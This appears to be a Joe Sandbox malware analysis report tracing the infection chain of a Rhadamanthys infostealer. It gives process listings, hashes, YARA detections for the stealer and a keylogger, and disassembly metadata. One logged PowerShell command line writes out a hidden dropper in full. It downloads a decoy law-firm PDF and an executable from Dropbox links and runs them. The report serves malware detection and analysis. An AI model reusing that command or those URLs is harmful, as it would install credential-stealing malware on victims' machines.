Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:9
Start time:12:40:19
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:11
Start time:12:40:22
Start date:10/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
Imagebase:0x7ff6af090000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:12:40:23
Start date:10/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:12:40:23
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:12:40:23
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:12:40:24
Start date:10/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:12:40:31
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:12:40:31
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:12:40:34
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:12:40:35
Start date:10/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3
Imagebase:0x7ff6c1cf0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:12:40:40
Start date:10/12/2024
Path:C:\Users\user\AppData\Local\Temp\111392827.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\111392827.exe"
Imagebase:0x400000
File size:1'843'712 bytes
MD5 hash:EB40135D3E0FE985A9E09970DC09A499
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                                                              • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                                                              Start time:12:40:57
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\111392827.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\111392827.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                              File size:1'843'712 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:EB40135D3E0FE985A9E09970DC09A499
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000002.2648884765.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                              Start time:12:40:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                                                                                                                                                              File size:676'584 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000019.00000003.2645361356.00000000053E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                              Start time:12:41:00
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472
                                                                                                                                                                                                                                                                                              Imagebase:0x170000
                                                                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                              Start time:12:41:11
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7b5950000
                                                                                                                                                                                                                                                                                              File size:827'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                              Start time:12:41:14
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 9800 -s 144
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7263c0000
                                                                                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                              Start time:12:41:19
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2396976388.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000010.00000002.2525192768.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f20000_powershell.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                                                                                                                                                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:0.4%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                Signature Coverage:8.5%
                                                                                                                                                                                                                                                                                                Total number of Nodes:82
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:4

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: 4ddf89da998eefb8505f89a636a61c237bfbb09b0b1cbd33e02ee9240a7bcf3b
                                                                                                                                                                                                                                                                                                • Instruction ID: 439e1dca2067285d06cf6f6a4178ed39b7b36ef521786ade533f23034682b911
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ddf89da998eefb8505f89a636a61c237bfbb09b0b1cbd33e02ee9240a7bcf3b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE12BCB1E092688FFB208B14DC44BEAB7B6EB81304F1441FAD44DA7281D7395ED68F56

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: cc41fd67b7d7193735979c5cb51afd4988cfeda4df8e219116f1c024732d6afa
                                                                                                                                                                                                                                                                                                • Instruction ID: 6eb529afb54c6f67b06e8446c300daf3170ac217e2b5d8fcea4f0faedfee5f04
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc41fd67b7d7193735979c5cb51afd4988cfeda4df8e219116f1c024732d6afa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D02E1B2D055688AF7208A14DC44BEABBB5FB90310F1041FED44D97281E77D1EC68F66

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 141 448357-448788 NtQueryDefaultLocale 146 448950-4491d6 call 448d09 call 44919b call 4491d7 141->146 147 44878e-4487e1 call 4487d3 141->147 159 4487f2-448817 147->159 163 448824 159->163 164 448819-448822 159->164 166 448853-4488de call 4488be 163->166 167 4487e3-4487ec 163->167 164->166 175 4488ef-448914 166->175 167->159 179 448916-44891f 175->179 180 448921 175->180 179->146 180->146 182 4488e0-4488e9 180->182 182->175
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00448780
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DefaultLocaleQuery
                                                                                                                                                                                                                                                                                                • String ID: 639;$J86;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                                • API String ID: 2949231068-3491020230
                                                                                                                                                                                                                                                                                                • Opcode ID: 8052c4c15bfba9244f1a1d6433a695cbe35de3090c29ea8e0d1fbbfb1ac673c8
                                                                                                                                                                                                                                                                                                • Instruction ID: f749d1ef7976965f2d03fd900c1d26fecdf9e34fab5d890f5e44a7de845755b5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8052c4c15bfba9244f1a1d6433a695cbe35de3090c29ea8e0d1fbbfb1ac673c8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4C1D1B1D095688AFB208A14DC44BEA7BB5FB90314F1480FED44DA7281E77D1EC68F66

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 249 44f92b-44f98d 252 44f9a0-44f9b5 249->252 253 44f98f-44f99b 249->253 255 44f9b7-44f9c3 252->255 256 44f9c8-44f9e7 252->256 254 44fc91-44fcbc VirtualProtect 253->254 262 44fcfc-44fd02 254->262 263 44fcbe-44fcfa 254->263 255->254 257 44f9e9-44f9f5 256->257 258 44f9fa-44fa0c 256->258 257->254 260 44fa0e-44fa1a 258->260 261 44fa1f-44fa88 258->261 260->254 266 44fc85-44fc8b 261->266 267 44fa8e-44fab9 261->267 264 44fd08-44fd0f 262->264 263->264 268 44fd11-44fd43 call 44fd24 call 44fd3f 264->268 269 44fd48-44feec call 44feed 264->269 266->254 271 44fabb-44fafa 267->271 284 450291-45068a call 45036d call 450673 268->284 269->284 277 44fb00-44fb10 271->277 278 44fb9b-44fbba call 44fbc9 271->278 277->278 281 44fb16-44fb2e call 44fb2a 277->281 290 44fbbf-44fbd0 278->290 281->271 300 450690-450804 call 450805 284->300 301 450f9c-4510ac call 450fac call 450fc2 call 4510bb 284->301 290->266
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                                • Instruction ID: 064f8fa3836340fe4a09f9ed83cbfec0a462ef6d0ccae8b76755501b7c72da8a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2df1873d63fa1a06318112b14a010a9538ef87cf4fe15887921df63ce8a161f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7A126A1D082988AF7248624DC44BEB7AB5EF51304F0480FED94D57282DA7E5FC9CF66

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 555 439110-43948a call 43913c 561 439490-43951b 555->561 562 43955e-439c43 call 4395e6 call 4398ff call 439918 555->562 561->562 577 43951d-439559 call 43954b 561->577 582 439c49-439ca6 call 439c6b VirtualProtect 562->582 577->582 591 439ca8-439ce6 582->591 592 439cee-439d40 call 439d41 582->592 591->592
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ad00d06e6d220283ac6635a1fe9b6b26238995bdaf4142d6a6f827a83d18564
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5c9e1630c1d426ed5cb226821b8745af9104571647b640adad73cbd07e73668
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F9144B2D092199FFB208A10DC85AE777B8EB85310F1441FBD84E56281D67D5FC68FA2

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,00000040,-00001BDD), ref: 0044FCB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
